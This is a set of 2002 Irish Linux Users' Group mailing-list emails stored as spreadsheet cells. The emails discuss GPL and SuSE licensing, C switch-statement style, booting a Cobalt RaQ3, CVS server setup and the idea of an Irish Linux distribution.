to all this - for example commercial entities
with trial/limited/crippled editions. Which is no problem - I don't see why that should
be a problem for SuSE though - surely the 
more the merrrier as far as they're concerned.
&gt; Are you clear on this point, now?
Vide supra.
&gt; This is my second try. 
Mighty white of you, old bean.
&gt;  One suspects that you actually understand
&gt;  perfectly, but just don't like it.
One can suspect what one likes. What I didn't 
understand was that SuSE had proprietary 
extensions that it wasn't prepared to allow
people to use under the GPL or even under  a
FreeBSD style licence.
I thought that the model for the likes of 
SuSE was selling support and customisation, 
rather than what I thought of as the core
"product". I thought that the likes of Yast
came under core - maybe it worked in the glory
days before, say, 2001 - I can understand that
they might want to make more money, but the way
in which they have done it, seems to me, to be 
be against the spirit of the GPL. 
&gt; You're further confused if you think the GNU 
&gt; GPL gives you the right to get covered software
&gt; for free.  It does not.  All I want is the OS and GNU apps. I was under
the impression that for *_those_* all one
needed was to pay for the media and not for the
code itself?Ai-je tort?
&gt; It provides that _if_ you've lawfully received
&gt; a copy of the covered binary version, you have
&gt; rights to also receive the matching source code.My understanding was that binaries or whatever
could be received for the cost of the media plus
a token of one's appreciation (the latter being
subject to agreement between the parties) - I was
offering a bottle of wine plus maybe a pint or two
and a chat for a copy - I don't know what the going
rate is.
If I wanted support from SuSE, that would be a
different issue, and one for which I would be
willing to pay.
 &gt; &gt; I don't particularly need support, so I'm 
&gt; &gt; no really interested in purchasing a set of 
&gt; &gt; disks with 4 billion apps which I'll never use.
&gt; Then, if you nonetheless want a SuSE boxed set's
&gt; contents, the only way you can do that without
&gt; copyright violation _and_ without having to pay
&gt; the purchase price is to get someone to _give_ 
&gt; (not "lend" or duplicate) you his copy.
I have a friend with 7.3 - I think that I'll
end up doing that!Seems to me to go against the spirit of
the GPL though.
&gt; &gt; Yes, thanks for your input. Anyway, I've a 
&gt; &gt; friend with 7.3 pro, so I'll just ask him.
&gt; Ask him _what_?  If you're asking him to "lend" or
&gt; duplicate his CDs, then you'll be ripping off SuSE
&gt; Linux AG illegally.
I have now realised this, thanks to your kind
explanations. I can borrow them, but not 
copy them? That's fine - IMHO, it goes against
the spirit of the GPL though. 
&gt; Don't like SuSE's product licensing?  Write your 
&gt; own distribution.  
And why not my own OS, while I'm at it?
&gt; You can even grab most of what you need 
&gt; _from SuSE_.  All you have to do is heed the
&gt; licensing terms on the individual pieces.
And, as I've tried to explain, is not the licence
terms on, say, trials for commercial company x
to which I object, it is the way SuSE appears, 
at least to my I.T. peasant self, to have
mixed up proprietary and open stuff. 
&gt; What, you think that's too much work?  Then, 
&gt; try a different distribution.
Hence my "To hell with SuSE" post...
&gt; Clue: _Not_ one packaged in a retail
&gt; boxed set.  Even RH 7.3 retail boxed sets include
&gt; non-freely redistributable applications on
&gt; the Star office 5.2 CD and the Productivity
&gt; Applications CD, among others.
And I have no problem with people sticking trial
editions along with GPL'ed stuff. Why you 
can't pass those on though, is beyond me.
Paul...___________________________________________________________
Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franÃ§ais !
Yahoo! Mail : http://fr.mail.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan wrote:
&gt; 
&gt; Rick Moen  a Ã©crit:
...
&gt; &gt; You're further confused if you think the GNU 
&gt; &gt; GPL gives you the right to get covered software
&gt; &gt; for free.  It does not.  
&gt; 
&gt; All I want is the OS and GNU apps. I was under
&gt; the impression that for *_those_* all one
&gt; needed was to pay for the media and not for the
&gt; code itself?
&gt; 
&gt; Ai-je tort?
&gt; 
&gt; 
&gt; &gt; It provides that _if_ you've lawfully received
&gt; &gt; a copy of the covered binary version, you have
&gt; &gt; rights to also receive the matching source code.
&gt; 
&gt; My understanding was that binaries or whatever
&gt; could be received for the cost of the media plus
&gt; a token of one's appreciation (the latter being
&gt; subject to agreement between the parties) - I was
&gt; offering a bottle of wine plus maybe a pint or two
&gt; and a chat for a copy - I don't know what the going
&gt; rate is.The GPL makes no stipulations about charging for binaries.
In fact, you can go get the sources for, say, GNU's /bin/true,
compile it yourself and try selling the resulting binary
for EUR 1000.  (And, with a good enough sales pitch, you
just might get away with it!)However, what the GPL does stipulate is that you must 
provide the sources for that binary if asked.  So I might
buy it from you for EUR 1000, compile it myself and sell
that binary for EUR 1.  Of course, I'll need to provide
the sources to anyone that asks as well.  But, I just
might make money at this, since there might be a market of
10000 people who would pay 1 euro for the convenience of
getting a binary.But then, John Looney would step in, buy it from me for
1 euro, burn it and the sources and some of his favourite
/bin/true patches on a CD and duplicate it for the cost of
the media or a cream bun, depending on how hungry he is.You see, the GPL doesn't force the binaries to be zero-cost
(or cost-of-media), but it puts a really big hole in any
business plan that solely resells GPL software.  You _can_
charge for it if you want, but you bloody well better be
providing some value for that money, or you'll go out of
business faster than a dot-com in 2001.And there are real ways to provide this value for money
(convenience of getting it on one CD, convenience of a
friendly installer, convenience of vendor-supplied updates,
convenience of having what lots of other people have,
posting a CD and paying a few euro is cheaper than downloading
over a modem, warm fuzzy feeling of getting something from
a "real" company, etc).There will be segments of the market that will pay various
amounts for GPL software and there will be others that don't.
Thankfully, the GPL allows for both, _by_design_.  But the
source will always be free (or minimal cost).Later,
Kenn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 08:05:58PM +0100, Nick Murtagh wrote:
&gt; On Mon, 2002-08-12 at 19:56, Kenn Humborg wrote:
&gt; &gt; Well, you should consider 'break' inside a 'select' statement
&gt; &gt; to be part of the syntax, rather than a control flow modifier.
&gt; 
&gt; Why? When it comes down to the assembly level, it gets turned
&gt; into some kind of jump instruction. Should I pretend I don't know
&gt; this when I'm programming?I know that.  And no, you shouldn't.  But see below.&gt; &gt; A _mandatory_ part of the syntax, at that.
&gt; 
&gt; It's not mandatory. You can leave out the break, and the flow
&gt; of control will continue to the next case. Which can be useful
&gt; in certain circumstances.I know that, too.However, the discussion was tending towards
"don't use things like goto and break to alter flow of control
in your program".  While not valid 100% of the time, it's a 
reasonable rule of thumb.  The idea is that, when looking at
code, it's easier to see how control moves through a 
function if your basic control blocks do all the work.  The
specific example of replacing a break in a while loop with
a modified while() expression shows this.  You only have to
look in one place to see when you'll run off the end of the
loop, not hunt through the whole loop.  (Although that particular
example wasn't really that good, since the extra test was 
adding on (... || done) and setting done = true in the loop.
Which is much the same as a break really.)The idea is to surprise the next programmer as little as 
possible when he sees the code.In a similar vein, having a break in every case of a select
block makes the flow much clearer.  Flow goes in, zero or 
one case blocks are executed and flows comes out the bottom.
Leaving out break statements breaks this assumption.My point is that, while there are a few situations where it
makes sense to leave out the breaks, I usually tend to 
consider the break at the end of each case more like the
brace at the end of the while block.  In fact, maybe it wouldn't have been a bad idea if the language
was designed such that the continue statement meant fall through
and break wasn't needed:   select (x) {
      case 1:
         /* do something - doesn't fall through */
      case 2:
         /* do something - falls through to next case*/
         continue;
      case 3:
         /* do something - doesn't fall through */
      default:
         /* do something - doesn't fall through */
   }Still, hindsight and all that.  Sigh.Later,
Kenn-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul, my apologies for being irritable on the subject.  I'll tone down
the rhetoric.Quoting Paul Linehan (plinehan@yahoo.com):&gt; Indeed - that I actually had understood prior to all this - for
&gt; example commercial entities with trial/limited/crippled editions. 
&gt; 
&gt; Which is no problem - I don't see why that should be a problem for
&gt; SuSE though - surely the more the merrrier as far as they're
&gt; concerned.Anything either you or I have to say about their motivation is
speculation.  Bearing that disclaimer in mind, here's mine:  They make
money from selling boxed sets.  They're glad to make some versions
available for almost-unrestricted distribution (not "for value") via CD
duplication or the Internet that they estimate won't substitute for
boxed-set sales.For example, they _could_ have packaged what I call the "FTP edition" 
in ISO9660 images.  The fact that they didn't suggests to me that they
see the inconvenience of mirroring FTP Edition i386 files (which, at the
moment, are v. 8.0) as motivation for all but the really determined to
buy boxed sets, instead.  Likewise, they _could_ release a v. 8.0 (current) version of the
"evaluation" single-disk ISO image.  Instead, they always keep it
several versions behind.  This again seems like an incentive to buy a
boxed set, after "evaluating" SuSE via the ISO image.Again, the above is my speculation (only) about their motivations.  All
we know of a certainty is what permissions they've granted, which are a
bit messy and complex, but nonetheless quite clear.Those permissions, as a reminder, apply to the SuSE-produced components,
YaST, YaST2, the distribution installer program, and possibly other
utilities that I don't know of.  _They_ wrote that code, and have every
right to grant or withhold permissions as suit them best.&gt; One can suspect what one likes. What I didn't understand was that SuSE
&gt; had proprietary extensions that it wasn't prepared to allow people to
&gt; use under the GPL or even under  a FreeBSD style licence.Hmm, let's slow down, here:  There's a persistent misconception that
it's possible to place somebody else's work under a new licence without
his permission.  Not so.  There is nothing in copyright law that would
make that possible.The copyright _owner_ has inherent rights in his (e.g., software) work,
and is entitled to issue as many _instances_ of his code under diverse
licences as he wishes.  (If he gives you a copy with no licence
statement, there's effectively a default licence by operation of
copyright law.  To avoid going into a long digression, let me just say
that it's a proprietary licence by default.  That's why, in order to
have open source software at all, there must be an explicit licence
from the copyright holder.)No Linux distribution _ever_ entails relicensing people's software
without their explicit permission -- since no such relicensing can occur
at all. 
You cannot get away with taking SuSE Linux AG's work and redistributing
it under what you claim to be a BSD licence, or the GPL, or anything at
all other than what the copyright owner has specified, because you
simply lack the right to do so.  Claiming to do it would be copyright
violation.&gt; I thought that the model for the likes of SuSE was selling support and
&gt; customisation, rather than what I thought of as the core "product". I
&gt; thought that the likes of Yast came under core - maybe it worked in
&gt; the glory days before, say, 2001 - I can understand that they might
&gt; want to make more money, but the way in which they have done it, seems
&gt; to me, to be be against the spirit of the GPL.If Stallman and friends at the GPL (let alone Linus Torvalds and kernel
contributors) had intended to prohibit putting GPLed works on the same
CDs as proprietary ones, and selling the result only via retail stores
(plus mail order, etc.) in shrink-wrapped boxes, I'm 100% certain they
could and would have done so.Guess what?  They did not.  They didn't even require that anybody give
you copies of the GPLed components, ever, at all.  All they did was
require that _if_ you received GPLed software lawfully, then you had to 
be able to get matching source code for a limited period, upon request.Spirit of the GPL, you say?  I'd suggest that Stallman and company knew
exactly what they were doing, and that the degree of access to GPLed
software is exactly what they had in mind.
&gt; All I want is the OS and GNU apps. I was under the impression that for
&gt; *_those_* all one needed was to pay for the media and not for the code
&gt; itself?
&gt; 
&gt; Ai-je tort?Mais si.You are indeed under a misconception, and may want to read the text of
the GPL to verify this fact.  The GPL does _not_ entitle you to a copy
of any binary software.  Section 2 provides for rights to access to
matching source code _if_ you have lawfully received a copy of a covered
binary.  That section provides three alternative mechanisms for the
distributor to provide such access.  And SuSE _do_ actually provide 
exactly that access.Or so I think to be the case.  If you believe there's some GPLed
codebase that you can lawfully receive from SuSE whose matching source
code they are not making available exactly as required, please tell us
which codebase that is.  (That would be SuSE Linux AG's headache, not
any of ours, but it might be interesting to examine.)&gt; My understanding was that binaries or whatever could be received for
&gt; the cost of the media plus a token of one's appreciation (the latter
&gt; being subject to agreement between the parties) - I was offering a
&gt; bottle of wine plus maybe a pint or two and a chat for a copy - I
&gt; don't know what the going rate is.Your understanding is almost correct, but not quite.  (1) The access
provisions of the GPL concern access to _source code_, not binaries.
(2) It kicks in _only_ for people who've lawfully received covered
binaries.  (3) _Covered_ software means instances of codebases actually
placed under the GNU GPL by their copyright owners.  The mere act of 
placing a piece of software on a CD-ROM with GPLed software doesn't GPL
it.In fact, the assertion to the contrary is a favourite FUD tactic from
enemies of Linux:  They're forever trying to convince software producers
that using GPLed software in any way with their proprietary offerings
will "taint" their copyrights and force them to put their property under
the GPL.  It's simply not so.&gt; If I wanted support from SuSE, that would be a different issue, and
&gt; one for which I would be willing to pay.That's nice, but they're not _offering_ the exact contents of the boxed
sets free of charge and lawful to duplicate &amp; redistribute, or "borrow".
For one thing, as you will have noticed from my earlier listing of
components, the boxed sets' CD-ROMs include quite a lot of _third-party_
proprietary software.  SuSE Linux AG _cannot_ allow you (or your friend)
to hand out copies of that software freely, because it's not theirs in
the first place.
&gt; I have a friend with 7.3 - I think that I'll end up doing that!If you mean the 3-CD core set of RH 7.3, good.  It's a quite decent
distribution.  But bear in mind that the RH 7.3 boxed sets include
some other third-party applications whose owners would be very upset to
find them being copied or "borrowed". &gt; I have now realised this, thanks to your kind explanations. I can
&gt; borrow them, but not copy them? No.Look, it's a collection of software, many elements of which may not be
lawfully just given out to multiple people:  Your friend installing it,
then _not_ erasing it but merely letting you "borrow" the CDs results in
the product being installed in multiple places.  That's unauthorised
copying.&gt; And, as I've tried to explain, is not the licence terms on, say,
&gt; trials for commercial company x to which I object, it is the way SuSE
&gt; appears, at least to my I.T. peasant self, to have mixed up
&gt; proprietary and open stuff.Well, if you don't like SuSE, then you probably won't like Caldera
eDesk, Xandros Desktop, Lycoris Deskop LX, Libranet, Lindows, or KRUD,
either.  Depending on your criteria, you also might not like Red Hat,
Linux-Mandrake, or Yellow Dog, since all of those have boxed-set retail
sets that include CD-ROMs that may not be publicly redistributed.
(I don't even use SuSE.  I'm just trying to clarify the licensing
question.)-- 
Cheers,                                             Live Faust, die Jung.
Rick Moen
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute wrote:
&gt; Rick Moen  wrote:
&gt; 
&gt; 
&gt; &gt; Don't like SuSE's product licensing?  Write your own distribution.  You
&gt; &gt; can even grab most of what you need _from SuSE_.  All you have to do is 
&gt; &gt; heed the licensing terms on the individual pieces.
&gt; 
&gt; 
&gt; How unimaginably difficult is this to do?It shouldn't be too hard.  Red Hat, for example, ships with everything
you need to build a modified distribution.  And it's all GPL (or free
enough).&gt; There are as far as I know, no Linux kernel hackers, Ahem.  There are more than one.&gt; nor distros 
&gt; that originate from this fair island right?
&gt; Right.
&gt; 
&gt; Yes it might be very,very difficult and subject to abject failure 
&gt; in sticking together a distro.... call it Dolmen Linux (or other), 
&gt; no doubt the packaging system would be one of the first places
&gt;  such a suggestion would stumble.
&gt; Some (like me) favouring a FreeBSD style ports system others favouring
&gt;  a Debian style system and others still favouring *rpm style packaging.
&gt; 
&gt; That said other *LUG have done interesting things like making blackbox.
&gt; 
&gt; Perhaps making a distro would be ..... umm.... fun.There was talk of this in the past.  Taking a regular distribution like
Red Hat or Debian and tweaking it for Ireland - things like translations,
ISP setups, default bookmarks.Never took off.Why not try it yourself.Later,
Kenn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 13 Aug 2002, wintermute wrote:&gt; There are as far as I know, no Linux kernel hackers, nor distros
&gt; that originate from this fair island right? Right.there are at least 3 irish kernel hackers (active/inactive) on this
list.regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
Let the people think they govern and they will be governed.
		-- William Penn, founder of Pennsylvania
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John,let me guess, you haven't tried the boot parameter root=/dev/hda2 if you
are using lilo??//Anders//On Mon, 2002-08-12 at 17:49, John P. Looney wrote:
&gt;  I'm getting places.
&gt; 
&gt;  Turns out that you can't have your /boot filesystem ext3, and the
&gt; /boot/vmlinux.gz file has to be a gzipped vmlinux file (not a vmlinuz one,
&gt; which though obvious...isn't, when you've been hitting your head off a
&gt; wall for a few days).
&gt; 
&gt;  Also, when you mkfs a filesystem that's called "/boot", as far as the
&gt; redhat /etc/fstab is concerned, it wipes that, so when you boot a rescue
&gt; CD, it doesn't mount /dev/hda1 as /boot, and doesn't inform you of this.
&gt; 
&gt;  (so, it's dead easy to work away on /mnt/sysimage/boot thinking you are
&gt; working on /dev/hda1, and wondering why no matter what you do, nothing
&gt; changes).
&gt; 
&gt;  Aaaaanyway. I have it booting the redhat kernel. But, the kernel isn't
&gt; loading root as /dev/hda2 - it keeps mounting /dev/hda1.
&gt; 
&gt;  Curiously, when I go into the boot prom, an use
&gt; 
&gt;  "set_params" I can tell it to mount /dev/hda2 as root. But then it uses
&gt; the PROM copy of the kernel (dodgy 2.2.16 kernel), which doesn't know
&gt; ext3, so wants to fsck up my disk.
&gt; 
&gt;  rdev on the vmlinux file, before gzipping doesn't work. I assume you
&gt; can't run rdev on the gzipped version. Any other ideas on how to tell a
&gt; kernel where it's root fs is ?
&gt; 
&gt; Kate
&gt; 
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie
-- 
Best Regards
Anders Holm
Critical Path Technical Support Engineer
========================================
Tel USA/Canada: 1 800 353 8437
Tel Worldwide:  +1 801 736 0806
E-mail:         technical.support@cp.net
Internet:       http://support.cp.net
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 06:54:28AM +0100, Anders Holm mentioned:
&gt; let me guess, you haven't tried the boot parameter root=/dev/hda2 if you
&gt; are using lilo?? Ah, you see - cobalt's don't use lilo. They have an openboot-like prom
that looks in an ext2 partition in /dev/hda1 for a file called
/boot/vmlinux.gz - nothing else. The only way I think you can set parameters is with a "set_params" line. However, when I run 
    set_params root=/dev/hda2
 and then run:
    bfd /boot/vmlinux.gz It boots the old kernel, I assume from the prom. It seems to do this, if
something goes wrong - no error, just boots the default kernel. BTW, 'bfd' means 'boot from disk'.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan mentioned:
&gt; And, as I've tried to explain, is not the licence
&gt; terms on, say, trials for commercial company x
&gt; to which I object, it is the way SuSE appears, 
&gt; at least to my I.T. peasant self, to have
&gt; mixed up proprietary and open stuff. Indeed. Personally, I think it's the sort of reprehensible behavior that
split Unix way-back-when into the mess it was in a few years back, before
Linux...got rid of most of them. Vendors wrote their own wierd-ass installers &amp; config tools to lock
people to their OS, they added all sorts of functionality that was not
availible to other OSes to make themselves different from the competition
(Motif on non-free OSes, incompatible filesystems etc). While a good idea when you share code &amp; standards, in an environment
where you do neither, the user suffers.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute mentioned:
&gt; How unimaginably difficult is this to do?  There are as far as I know,
&gt; no Linux kernel hackers, nor distros that originate from this fair
&gt; island right?  Right. Antefacto Embedded Linux...did. Nice little distro that'd run on a 64MB flash card (with 12MB free), with
a read-only root filesystem. Perfect for little embedded systems. It was a
very cut down version of RedHat 7.2. Must see can we release the build system &amp; everything. That was the
interesting bit. Distros, in general, are a waste of time. You've no idea
how much better something like Debian or RedHat could be than something
you did yourself, unless you picked a niche area.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute wrote:
&gt; How unimaginably difficult is this to do?
&gt; There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?
&gt; Right.i think there's a mailing list on linux.ie for this.also, there's niall's work on the bbc.  no, not that bbc, the bootable
business card.kevin--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</si>
  <si>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Assuming cvspserver is actually running (try "netstat -na | grep 2401" to
see if its there), make sure you have firewalling turned off or you have
added a rule for it.
&gt; Hi, I'm setting up a CVS server on a RedHat 7.* box. First time.
&gt;
&gt; When I try to log in via telnet with an account that is in the "cvs" group
&gt; and run
&gt;
&gt; cvs login
&gt; password: xxxxx
&gt;
&gt; I get
&gt;
&gt; cvs [login aborted]: connect to localhost:2401 failed: Connection refused
&gt;
&gt;
&gt; &gt; chkconfig --list  returns
&gt;
&gt; xinetd based services:
&gt;         linuxconf-web:  off
&gt;         swat:   on
&gt;         telnet: on
&gt;         cvspserver:     on
&gt;
&gt; As a cvs user
&gt;
&gt; [cvsdev1@localhost cvsdev1]$ echo $CVSROOT
&gt; :pserver:cvsdev1@localhost:/home/cvsroot/repository
&gt;
&gt; [cvsdev1@localhost cvsdev1]$ ls -la /home/cvsroot/repository/
&gt; total 12
&gt; drwxrws---    3 cvs      cvs          4096 Aug 12 11:26 .
&gt; drwxrwx---    7 cvs      cvs          4096 Aug 12 11:26 ..
&gt; drwxrwsr-x    3 cvs      cvs          4096 Aug 12 11:26 CVSROOT
&gt; [cvsdev1@localhost cvsdev1]$
&gt;
&gt;
&gt;
&gt; Where should I start looking?
&gt;
&gt; Thanks Justin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</si>
  <si>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 xml:space="preserve">Was the Ultra 5 the sunray server? What images did you serve to the sunrays
to boot them over tftp/dhcp? 
&gt; 
&gt; Hi Damian.
&gt; 
&gt; SuSe has a Sparc version I previously been running on a Sun 
&gt; Ultra 5 at 
&gt; least. Worked fine, albeit a bit slow... ;)
&gt; 
&gt; //Anders
&gt; -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  Curiously, when I go into the boot prom, an use
&gt; 
&gt;  "set_params" I can tell it to mount /dev/hda2 as root. But 
&gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 
&gt; kernel), which doesn't know ext3, so wants to fsck up my disk.Boot prom on a cobalt? Is this an old mips based one? How did you get to it?-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">hey,AFAIK it isn't hard at all to create
your own modified version of the redhat
distro.  There's even a tarball[1] with this
specifically in mind.  The people who built
the Ximian version of RedHat used a system
similar to said tarball.Building a distro which uses a *BSD ports
system rather than rpm, deb or whatever
would complicate things a tad more IMHO.It *is* a good idea though.  I've been 
wondering about the same thing for a couple
of months now but always considered it too
complicated to carry out. (If that makes any
sense at all).I don't discount any other work like for 
example Niall's work on the B.B.C. but maybe
there is general interest in an Irish distro.
Anyone?Regards,
Shane.-----Original Message-----
From: wintermute [mailto:cout@eircom.net]
Sent: 13 August 2002 00:48
To: ilug@linux.ie
Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
Rick Moen  wrote:
&gt; Don't like SuSE's product licensing?  Write your own distribution.  You
&gt; can even grab most of what you need _from SuSE_.  All you have to do is 
&gt; heed the licensing terms on the individual pieces.
How unimaginably difficult is this to do?
There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?
Right.Yes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packaging.That said other *LUG have done interesting things like making blackbox.Perhaps making a distro would be ..... umm.... fun.Just a pseudo random thought.
I'm only laughing on the outside 
My smile is just skin deep 
If you could see inside I'm really crying 
You might join me for a weep.
&lt;&gt;--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</si>
  <si>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On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:
&gt; &gt;  Curiously, when I go into the boot prom, an use
&gt; &gt;  "set_params" I can tell it to mount /dev/hda2 as root. But 
&gt; &gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 
&gt; &gt; kernel), which doesn't know ext3, so wants to fsck up my disk.
&gt; Boot prom on a cobalt? Is this an old mips based one? How did you get to it? This is actually a raq3. Though, I do have an old raq2 that Liam was
helping me get netbsd on (about all you'll get on a 16MB machine these
days). Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs
to be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm
getting there.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">But how did you get to the prom on it? I have an assortment of qubes and
raqs here and they have lcd displays but I see no way of entering commands
that way. You using a serial cable or something?&gt;  This is actually a raq3. Though, I do have an old raq2 that 
&gt; Liam was helping me get netbsd on (about all you'll get on a 
&gt; 16MB machine these days).
&gt; 
&gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and 
&gt; set the bootfs to be hda2. It worked, though it's mounting an 
&gt; ext3fs as ext2. But I'm getting there.
&gt; 
&gt; Kate
&gt; -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; I don't discount any other work like for
 &gt; example Niall's work on the B.B.C. but maybe
 &gt; there is general interest in an Irish distro.
 &gt; Anyone?
 I'll bite.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt; On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:
&gt; 
&gt;&gt;&gt; Curiously, when I go into the boot prom, an use
&gt;&gt;&gt; "set_params" I can tell it to mount /dev/hda2 as root. But 
&gt;&gt;&gt;then it uses the PROM copy of the kernel (dodgy 2.2.16 
&gt;&gt;&gt;kernel), which doesn't know ext3, so wants to fsck up my disk.
&gt;&gt;
&gt;&gt;Boot prom on a cobalt? Is this an old mips based one? How did you get to it?serial I would guess&gt; 
&gt;  This is actually a raq3. Though, I do have an old raq2 that Liam was
&gt; helping me get netbsd on (about all you'll get on a 16MB machine these
&gt; days).
&gt; 
&gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs
&gt; to be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm
&gt; getting there.
&gt; http://list.cobalt.com/pipermail/cobalt-developers/2001-February/026056.htmlPÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 10:03:14AM +0100, Damian O' Sullivan mentioned:
&gt; But how did you get to the prom on it? I have an assortment of qubes and
&gt; raqs here and they have lcd displays but I see no way of entering commands
&gt; that way. You using a serial cable or something? Yep. Power on the box while pushing the recessed button near the LCD with a
paper clip. On the serial console, you'll see "press space to enter the
prom". It's a crap prom, but a prom, nonetheless.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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should.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:
&gt; distro.  There's even a tarball[1] with thissegfault.  core dumped.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 10:04:55AM +0100, Padraig Brady mentioned:
&gt; http://list.cobalt.com/pipermail/cobalt-developers/2001-February/026056.html That isn't the problem - I've flashed the raq3 with the 2.3.40 PROM, a
beta one, required to get the 2.4 kernel's booting.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">hmm, I've never used gentoo
so I'll have to take your word
on that.  Perhaps something 
similar to that Ximian RedHat
dealy would be cool.  Like
a gui installer for slackware![1];]shane[1]I'm shure Patrick V. would love
that.(not)-----Original Message-----
From: John P. Looney [mailto:valen@tuatha.org]
Sent: 13 August 2002 10:01
To: ilug@linux.ie
Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
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should.Kate
--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</si>
  <si>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Kate P Looney wrote:
&gt; Vendors wrote their own wierd-ass installers &amp; config tools to lock
&gt; people to their OS, they added all sorts of functionality that was not
&gt; availible to other OSes to make themselves different from the competitionI think the words you are looking for are "competitive advantage" or
"differentiation".Since most Linux vendors are businesses, they need to make money to
survive[1]. To make money they need to sell products. To ensure they sell
their product, they must provide something that other vendors do not.The down side is that this produces many variations of the same product. The
benefit of open source is that there is a common standard which everyone can
share. (The up side is that the competition drives the different
organisations to constantly improve their product offering[2].)So unlike SunOS vs AIX vs HPUX vs Tru64, where the API's and available
functionality were often starkly different, Linux distributions are mostly
the same.While I may have to look in /var/named on Red Hat, and /etc/bind on Debian,
the binaries are basically the same, as are the man pages. In most cases,
doing a "man named" will reveal the compiled location of the config files.
So long as this is understood, it is easy enough to administer most Linux
